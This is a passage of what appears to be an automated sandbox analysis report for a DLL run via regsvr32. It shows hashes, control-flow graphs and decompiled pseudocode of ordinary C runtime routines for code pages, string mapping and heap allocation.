                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Info
                                                                                                              • String ID:
                                                                                                              • API String ID: 1807457897-3916222277
                                                                                                              • Opcode ID: d9acb88ddee99d9115fbeffe36796bfe73993c43ec680cc4f470f3c9ee229a4f
                                                                                                              • Instruction ID: 45beae8c31182e40bb891fc18015bbf40f6ad46bb93bd9606136f1320e6b5038
                                                                                                              • Opcode Fuzzy Hash: d9acb88ddee99d9115fbeffe36796bfe73993c43ec680cc4f470f3c9ee229a4f
                                                                                                              • Instruction Fuzzy Hash: 9851A373618AC49AE7A2CF34E0843DE7BA0F34D788F548126E78947A85CF78C659CB44
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00000001800479AC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 245 1800479ac-1800479e5 call 180046d38 247 1800479ea-1800479f0 245->247 248 180047a51-180047a7d call 180047a98 LCMapStringW 247->248 249 1800479f2-180047a4f 247->249 253 180047a83-180047a97 248->253 249->253
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: String
                                                                                                              • String ID: LCMapStringEx
                                                                                                              • API String ID: 2568140703-3893581201
                                                                                                              • Opcode ID: 22c41cc1737a1f7e516d08b33f7ab7c64c018c98293824f0d26afa09a3e3a790
                                                                                                              • Instruction ID: d1a734bf7d7933ad49ea475ed5f3ed59c89837c6b83ca95df6d1bea67a01fcd9
                                                                                                              • Opcode Fuzzy Hash: 22c41cc1737a1f7e516d08b33f7ab7c64c018c98293824f0d26afa09a3e3a790
                                                                                                              • Instruction Fuzzy Hash: A3214C75708B8486D7A0CB56F88039AB3A5F7CCBC4F548126EE8D93B19DF38C6548B40
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180044E94 Relevance: 3.2, APIs: 2, Instructions: 193COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 254 180044e94-180044ec7 call 180044768 257 180045121-180045124 call 1800447f8 254->257 258 180044ecd-180044eda 254->258 263 180045129 257->263 259 180044edd-180044edf 258->259 261 180044ee5-180044ef0 259->261 262 180045033-180045061 call 1800046a0 259->262 261->259 264 180044ef2-180044ef8 261->264 273 180045064-18004506a 262->273 266 18004512b-180045150 call 1800028f0 263->266 268 180044efe-180044f09 IsValidCodePage 264->268 269 18004502b-18004502e 264->269 268->269 272 180044f0f-180044f16 268->272 269->266 274 180044f46-180044f55 GetCPInfo 272->274 275 180044f18-180044f26 272->275 276 1800450aa-1800450b4 273->276 277 18004506c-18004506f 273->277 281 18004501f-180045025 274->281 282 180044f5b-180044f7b call 1800046a0 274->282 279 180044f2a-180044f3c call 180044890 275->279 276->273 278 1800450b6-1800450c2 276->278 277->276 280 180045071-18004507c 277->280 283 1800450c4-1800450c7 278->283 284 1800450ed 278->284 292 180044f41 279->292 286 1800450a2-1800450a8 280->286 287 18004507e 280->287 281->257 281->269 299 180045015 282->299 300 180044f81-180044f8a 282->300 289 1800450e4-1800450eb 283->289 290 1800450c9-1800450cc 283->290 291 1800450f4-180045107 284->291 286->276 286->277 293 180045082-180045089 287->293 289->291 295 1800450ce-1800450d0 290->295 296 1800450db-1800450e2 290->296 297 18004510b-18004511a 291->297 292->263 293->286 298 18004508b-1800450a0 293->298 295->291 304 1800450d2-1800450d9 295->304 296->291 297->297 305 18004511c 297->305 298->286 298->293 303 180045017-18004501a 299->303 301 180044fb8-180044fbc 300->301 302 180044f8c-180044f8f 300->302 307 180044fc1-180044fca 301->307 302->301 306 180044f91-180044f9a 302->306 303->279 304->291 305->257 308 180044fb0-180044fb6 306->308 309 180044f9c-180044fa1 306->309 307->307 310 180044fcc-180044fd5 307->310 308->301 308->302 311 180044fa4-180044fae 309->311 312 180045005 310->312 313 180044fd7-180044fda 310->313 311->308 311->311 314 18004500c-180045013 312->314 315 180044ffc-180045003 313->315 316 180044fdc-180044fdf 313->316 314->303 315->314 317 180044fe1-180044fe3 316->317 318 180044ff3-180044ffa 316->318 319 180044fe5-180044fe8 317->319 320 180044fea-180044ff1 317->320 318->314 319->314 320->314
                                                                                                              C-Code - Quality: 84%
                                                                                                              			E00000001180044E94(void* __ecx, void* __esp, void* __eflags, signed long long __rbx, void* __rdx, long long __rbp, void* __r8, void* __r10, long long _a24, long long _a32) {
				signed long long _v48;
				void* _v52;
				signed int _v60;
				char _v78;
				char _v84;
				void* __rdi;
				void* _t53;
				void* _t89;
				intOrPtr _t92;
				void* _t96;
				void* _t111;
				signed char _t112;
				intOrPtr _t114;
				intOrPtr _t120;
				void* _t121;
				signed long long _t123;
				signed long long _t133;
				signed long long _t134;
				signed long long _t138;
				signed char* _t142;
				char* _t151;
				void* _t157;
				void* _t159;
				void* _t162;
				void* _t165;

				_t165 = __r8;
				_t134 = __rbx;
				_a24 = __rbx;
				_a32 = __rbp;
				_t123 =  *0x80070098; // 0xde2ac6aee6eb
				_v48 = _t123 ^ _t162 - 0x00000040;
				_t159 = __rdx;
				_t53 = E00000001180044768(__ecx, __eflags, _t123 ^ _t162 - 0x00000040);
				_t89 = _t53;
				if (_t53 == 0) goto 0x80045121;
				r14d = 0;
				_t4 = _t134 + 1; // 0x1
				_t96 = _t4;
				if ( *0x80070840 == _t89) goto 0x80045033;
				r14d = r14d + _t96;
				if (r14d - 5 < 0) goto 0x80044edd;
				if (_t89 == 0xfde8) goto 0x8004502b;
				if (IsValidCodePage(??) == 0) goto 0x8004502b;
				if (_t89 != 0xfde9) goto 0x80044f46;
				 *((long long*)(__rdx + 4)) = 0x180070870;
				 *((long long*)(__rdx + 0x220)) = __rbx;
				 *((intOrPtr*)(__rdx + 0x18)) = 0;
				 *((short*)(__rdx + 0x1c)) = 0;
				_t9 = _t159 + 0xc; // 0xc
				_t157 = _t9;
				memset(_t89, 0, 6);
				E00000001180044890(__rbx, __rdx, _t157); // executed
				goto 0x80045129;
				_t151 =  &_v84;
				if (GetCPInfo(??, ??) == 0) goto 0x8004501f;
				_t11 = _t159 + 0x18; // 0x18
				r8d = 0x101;
				E000000011800046A0(_t59, 0, _t11, _t151, _t165);
				 *((intOrPtr*)(_t159 + 4)) = _t89 + 6;
				 *(_t159 + 0x220) = _t134;
				if (_v84 != 2) goto 0x80045015;
				_t142 =  &_v78;
				if (_v78 == 0) goto 0x80044fb8;
				if (_t142[1] == 0) goto 0x80044fb8;
				_t111 = ( *_t142 & 0x000000ff) - (_t142[1] & 0x000000ff);
				if (_t111 > 0) goto 0x80044fb0;
				 *(_t157 + _t159 + 0x18) =  *(_t157 + _t159 + 0x18) | 0x00000004;
				_t92 = _t151 + 1 + _t96;
				if (_t111 != 0) goto 0x80044fa4;
				_t112 = _t142[2];
				if (_t112 != 0) goto 0x80044f8c;
				_t25 = _t159 + 0x1a; // 0x1a
				 *_t25 =  *_t25 | 0x00000008;
				if (_t112 != 0) goto 0x80044fc1;
				if (_t112 == 0) goto 0x80045005;
				if (_t112 == 0) goto 0x80044ffc;
				if (_t112 == 0) goto 0x80044ff3;
				if ( *((intOrPtr*)(_t159 + 4)) - 0x393 == _t96) goto 0x80044fea;
				goto 0x8004500c;
				goto 0x8004500c;
				goto 0x8004500c;
				goto 0x8004500c;
				_t133 =  *0x800612c8; // 0x1800612e8
				 *(_t159 + 0x220) = _t133;
				goto 0x80045017;
				 *((intOrPtr*)(_t159 + 8)) = 0;
				goto 0x80044f2a;
				_t114 =  *0x80071ea8; // 0x0
				if (_t114 != 0) goto 0x80045121;
				goto 0x8004512b;
				_t29 = _t159 + 0x18; // 0x18
				r8d = 0x101;
				E000000011800046A0((_t142[1] & 0x000000ff) - ( *_t142 & 0x000000ff) | 0xffffffff, 0, _t29, _t151 - __rbp, _t165);
				r14d = 4;
				if ( *0x180070850 == 0) goto 0x800450aa;
				if ( *0x180070851 == 0) goto 0x800450aa;
				r8d =  *0x180070850 & 0x000000ff;
				if (r8d - ( *0x180070851 & 0x000000ff) > 0) goto 0x800450a2;
				_t35 = _t165 + 1; // 0x4
				r10d = _t35;
				if (r10d - 0x101 >= 0) goto 0x800450a2;
				r8d = r8d;
				 *(__r10 + _t159 + 0x18) =  *(__r10 + _t159 + 0x18) |  *0x80070830;
				r10d = r10d;
				if (r8d - ( *0x180070851 & 0x000000ff) <= 0) goto 0x80045082;
				_t120 =  *0x180070852;
				if (_t120 != 0) goto 0x8004506c;
				if (_t120 != 0) goto 0x80045064;
				 *((intOrPtr*)(_t159 + 4)) = _t92;
				 *((intOrPtr*)(_t159 + 8)) = 0;
				if (_t120 == 0) goto 0x800450ed;
				if (_t120 == 0) goto 0x800450e4;
				if (_t120 == 0) goto 0x800450db;
				_t121 = _t92 - 0x393;
				if (_t121 != 0) goto 0x800450f4;
				goto 0x800450f4;
				goto 0x800450f4;
				goto 0x800450f4;
				_t138 =  *0x800612c8; // 0x1800612e8
				 *(_t159 + 0x220) = _t138;
				_t44 = _t159 + 0xc; // 0x10
				 *_t44 =  *((_t133 + _t133 * 2 << 4) - _t159 + 0x80070840 + _t44 - 8) & 0x0000ffff;
				if (_t121 != 0) goto 0x8004510b;
				goto 0x80044f39;
				E000000011800447F8(_t92 - 0x393, __esp + 0xc, _t133, _t138, _t159, _t44 + 2, _t165);
				return E000000011800028F0(0, 6, _v60 ^ _t162 - 0x00000040);
			}




























                                                                                                              0x180044e94
                                                                                                              0x180044e94
                                                                                                              0x180044e94
                                                                                                              0x180044e99
                                                                                                              0x180044eaa
                                                                                                              0x180044eb4
                                                                                                              0x180044eb9
                                                                                                              0x180044ebc
                                                                                                              0x180044ec3
                                                                                                              0x180044ec7
                                                                                                              0x180044ed4
                                                                                                              0x180044eda
                                                                                                              0x180044eda
                                                                                                              0x180044edf
                                                                                                              0x180044ee5
                                                                                                              0x180044ef0
                                                                                                              0x180044ef8
                                                                                                              0x180044f09
                                                                                                              0x180044f16
                                                                                                              0x180044f18
                                                                                                              0x180044f1c
                                                                                                              0x180044f23
                                                                                                              0x180044f26
                                                                                                              0x180044f2a
                                                                                                              0x180044f2a
                                                                                                              0x180044f36
                                                                                                              0x180044f3c
                                                                                                              0x180044f41
                                                                                                              0x180044f46
                                                                                                              0x180044f55
                                                                                                              0x180044f5b
                                                                                                              0x180044f61
                                                                                                              0x180044f67
                                                                                                              0x180044f71
                                                                                                              0x180044f74
                                                                                                              0x180044f7b
                                                                                                              0x180044f81
                                                                                                              0x180044f8a
                                                                                                              0x180044f8f
                                                                                                              0x180044f98
                                                                                                              0x180044f9a
                                                                                                              0x180044fa4
                                                                                                              0x180044fa9
                                                                                                              0x180044fae
                                                                                                              0x180044fb4
                                                                                                              0x180044fb6
                                                                                                              0x180044fb8
                                                                                                              0x180044fc1
                                                                                                              0x180044fca
                                                                                                              0x180044fd5
                                                                                                              0x180044fda
                                                                                                              0x180044fdf
                                                                                                              0x180044fe3
                                                                                                              0x180044fe8
                                                                                                              0x180044ff1
                                                                                                              0x180044ffa
                                                                                                              0x180045003
                                                                                                              0x180045005
                                                                                                              0x18004500c
                                                                                                              0x180045013
                                                                                                              0x180045017
                                                                                                              0x18004501a
                                                                                                              0x18004501f
                                                                                                              0x180045025
                                                                                                              0x18004502e
                                                                                                              0x180045033
                                                                                                              0x180045039
                                                                                                              0x18004503f
                                                                                                              0x180045053
                                                                                                              0x18004506a
                                                                                                              0x18004506f
                                                                                                              0x180045071
                                                                                                              0x18004507c
                                                                                                              0x18004507e
                                                                                                              0x18004507e
                                                                                                              0x180045089
                                                                                                              0x18004508e
                                                                                                              0x180045091
                                                                                                              0x180045096
                                                                                                              0x1800450a0
                                                                                                              0x1800450a6
                                                                                                              0x1800450a8
                                                                                                              0x1800450b4
                                                                                                              0x1800450b6
                                                                                                              0x1800450b9
                                                                                                              0x1800450c2
                                                                                                              0x1800450c7
                                                                                                              0x1800450cc
                                                                                                              0x1800450ce
                                                                                                              0x1800450d0
                                                                                                              0x1800450d9
                                                                                                              0x1800450e2
                                                                                                              0x1800450eb
                                                                                                              0x1800450ed
                                                                                                              0x1800450f7
                                                                                                              0x1800450fe
                                                                                                              0x180045110
                                                                                                              0x18004511a
                                                                                                              0x18004511c
                                                                                                              0x180045124
                                                                                                              0x180045150

                                                                                                              APIs
                                                                                                                • Part of subcall function 0000000180044768: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,0000000180044AB4), ref: 0000000180044792
                                                                                                              • IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,?,0000000180044BE5), ref: 0000000180044F01
                                                                                                              • GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,?,0000000180044BE5), ref: 0000000180044F4D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CodeInfoPageValid
                                                                                                              • String ID:
                                                                                                              • API String ID: 546120528-0
                                                                                                              • Opcode ID: 260d01a8b1191ad9d10459e6678788de177e802bd272d7eb49cab8dfc4fbdc58
                                                                                                              • Instruction ID: a23aab874359d009a3c9f2bc78f504518fd133b6ed2d842b610394973c4e34db
                                                                                                              • Opcode Fuzzy Hash: 260d01a8b1191ad9d10459e6678788de177e802bd272d7eb49cab8dfc4fbdc58
                                                                                                              • Instruction Fuzzy Hash: AF81F377204A8886F7E28F25A0903ED77A1E3487C5F5AC122FA8947692DE39C74DC348
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018000E220 Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 321 18000e220-18000e22b call 18000f8ec 323 18000e230-18000e239 321->323 324 18000e23b-18000e24b call 18000f9c4 323->324 325 18000e260 323->325 329 18000e25b call 18000e268 324->329 330 18000e24d-18000e259 324->330 326 18000e262-18000e266 325->326 329->325 330->326
                                                                                                              C-Code - Quality: 58%
                                                                                                              			E0000000118000E220() {
				intOrPtr _t2;

				E0000000118000F8EC(); // executed
				 *0x800700d0 = _t2;
				if (_t2 == 0xffffffff) goto 0x8000e260;
				0x8000f9c4();
				if (_t2 == 0) goto 0x8000e25b;
				 *0x800713d8 = 0xfffffffe;
				goto 0x8000e262;
				E0000000118000E268();
				return 0;
			}




                                                                                                              0x18000e22b
                                                                                                              0x18000e230
                                                                                                              0x18000e239
                                                                                                              0x18000e244
                                                                                                              0x18000e24b
                                                                                                              0x18000e24d
                                                                                                              0x18000e259
                                                                                                              0x18000e25b
                                                                                                              0x18000e266

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Alloc__vcrt___vcrt_uninitialize_ptd
                                                                                                              • String ID:
                                                                                                              • API String ID: 3765095794-0
                                                                                                              • Opcode ID: 4e7724080e4aacb066077791a60f75a6f748c6004d6e480140db4ecc22598ac2
                                                                                                              • Instruction ID: 65a8b84725dda7b754ae3fd3a3c97c1827b63bf5eb155bccbccdb5bf8520d3c5
                                                                                                              • Opcode Fuzzy Hash: 4e7724080e4aacb066077791a60f75a6f748c6004d6e480140db4ecc22598ac2
                                                                                                              • Instruction Fuzzy Hash: E7E04F30A0468CD5FAE6EB3858463E43258274F3E0FA0C711B025966E2DF28834E9710
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018003F8F4 Relevance: 2.5, APIs: 2, Instructions: 18memoryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 332 18003f8f4-18003f8f7 333 18003f8f9-18003f912 HeapFree 332->333 334 18003f92f 332->334 335 18003f914-18003f923 GetLastError call 180013a44 call 180013b18 333->335 336 18003f92a-18003f92e 333->336 335->336 336->334
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 485612231-0
                                                                                                              • Opcode ID: 7feab53bc8141cfddc754512938789f701b57d87cc7f42e144850f1edffadfc4
                                                                                                              • Instruction ID: b908c6930c5ab40a117e896001ffe84853dd0da69792a0aea7953c5c77e21790
                                                                                                              • Opcode Fuzzy Hash: 7feab53bc8141cfddc754512938789f701b57d87cc7f42e144850f1edffadfc4
                                                                                                              • Instruction Fuzzy Hash: C8E01271B0194C72FFEB67F258553F512915F5C7C1F04C422790592252EE29868D4344
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180051AE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                              • String ID:
                                                                                                              • API String ID: 3215553584-0
                                                                                                              • Opcode ID: 6a08b546ad0cf6933d0605f9b8b53e7cdbdf8e6a24c9dd7cb83df8a73a4d8a69
                                                                                                              • Instruction ID: 0f346e8b7b22d69d630ddb5df0c91f9792c4e65a53a9164aa44c2bd52a1f97f8
                                                                                                              • Opcode Fuzzy Hash: 6a08b546ad0cf6933d0605f9b8b53e7cdbdf8e6a24c9dd7cb83df8a73a4d8a69
                                                                                                              • Instruction Fuzzy Hash: F711C232208A889AF3969F14E4903D977A5F38C7C1F458524FA95677E2EF3ADB18C700
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180042404 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 360 180042404-180042413 361 180042415-180042421 360->361 362 180042423-180042433 360->362 361->362 363 180042466-180042471 call 180013b18 361->363 364 18004244a-180042462 RtlAllocateHeap 362->364 369 180042473-180042478 363->369 365 180042435-18004243c call 18004cc48 364->365 366 180042464 364->366 365->363 372 18004243e-180042448 call 180039c28 365->372 366->369 372->363 372->364
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(?,?,00000000,000000018003D1CA,?,?,?,0000000180013B21,?,?,?,?,000000018003F928), ref: 0000000180042459
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: 6df60b198beaba21e08df33ef050db9306f7c3fc6f072e8e29b5c7a32367a3fe
                                                                                                              • Instruction ID: ce10647a070d8ed039022375b8ebf862bdb2fb0c06172afa246f769aa7cb0dba
                                                                                                              • Opcode Fuzzy Hash: 6df60b198beaba21e08df33ef050db9306f7c3fc6f072e8e29b5c7a32367a3fe
                                                                                                              • Instruction Fuzzy Hash: 42F09070301A0D41FEDB576299913E54290ABCDBC4F8DD4317D0A863C1EE1CC78D4329
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018003F930 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 375 18003f930-18003f93d 376 18003f97b-18003f986 call 180013b18 375->376 377 18003f93f-18003f94b 375->377 384 18003f988-18003f98d 376->384 378 18003f962-18003f977 RtlAllocateHeap 377->378 380 18003f979 378->380 381 18003f94d-18003f954 call 18004cc48 378->381 380->384 381->376 386 18003f956-18003f960 call 180039c28 381->386 386->376 386->378
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(?,?,00000000,0000000180048914,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000000018003F96E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: e5a31d79c21f22ade887a10b4e2ed2eadefb17b048c8447aee16b90742452c20
                                                                                                              • Instruction ID: 12ab2d00a1801d220eabafaae87e64719d8e54111dfcfbb84cdd53af54dab7a2
                                                                                                              • Opcode Fuzzy Hash: e5a31d79c21f22ade887a10b4e2ed2eadefb17b048c8447aee16b90742452c20
                                                                                                              • Instruction Fuzzy Hash: ABF0F83031160D51FEE76BA259913F623805B8D7E0F0AC626792A863C5DE29868D8320
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180003628 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              C-Code - Quality: 68%
                                                                                                              			E00000001180003628(void* __ecx) {
				void* _t3;
				void* _t15;

				_t2 =  ==  ? 1 :  *0x80071298 & 0x000000ff;
				 *0x80071298 =  ==  ? 1 :  *0x80071298 & 0x000000ff;
				0x80003d28(); // executed
				_t3 = E00000001180004EA8(); // executed
				if (_t3 != 0) goto 0x80003657;
				goto 0x8000366b; // executed
				E0000000118003C308(_t15); // executed
				if (0 != 0) goto 0x80003669;
				E00000001180004EF8(0);
				goto 0x80003653;
				return 1;
			}





                                                                                                              0x18000363c
                                                                                                              0x18000363f
                                                                                                              0x180003645
                                                                                                              0x18000364a
                                                                                                              0x180003651
                                                                                                              0x180003655
                                                                                                              0x180003657
                                                                                                              0x18000365e
                                                                                                              0x180003662
                                                                                                              0x180003667
                                                                                                              0x180003670

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __scrt_dllmain_crt_thread_attach
                                                                                                              • String ID:
                                                                                                              • API String ID: 2860701742-0
                                                                                                              • Opcode ID: 6872538b16b6f02c47732e22586e56045e342ae397f28685f7f2bb8f15c04e73
                                                                                                              • Instruction ID: 8ff6159b75b66d1356b59725ac8bf0d5e6832807f47fa4298edda68841e5800a
                                                                                                              • Opcode Fuzzy Hash: 6872538b16b6f02c47732e22586e56045e342ae397f28685f7f2bb8f15c04e73
                                                                                                              • Instruction Fuzzy Hash: ACE04FB260428C64FED7A67A20437FA37841B1D3C1F14C069785A872D3CE0B57AE2726
